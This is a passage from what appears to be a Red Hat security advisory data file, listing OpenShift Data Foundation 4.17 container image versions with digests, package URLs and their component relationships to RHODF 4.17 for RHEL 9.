"odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product_id: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product: { name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product_id: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product: { name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product_id: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product: { name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product_id: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product_id: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product_id: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product: { name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product_id: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product: { name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product_id: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product: { name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product_id: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product: { name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product_id: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product_id: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product: { name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product_id: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2?arch=arm64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product: { name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product_id: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product: { name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product_id: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product_id: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product: { name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product_id: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product: { name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product_id: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0?arch=arm64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c?arch=arm64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product: { name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product_id: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db?arch=arm64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product: { name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product_id: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97?arch=arm64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product: { name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product_id: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae?arch=arm64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", }, product_reference: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", }, product_reference: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", }, product_reference: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", }, product_reference: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", }, product_reference: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", }, product_reference: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", }, product_reference: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", }, product_reference: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", }, product_reference: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", }, product_reference: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: 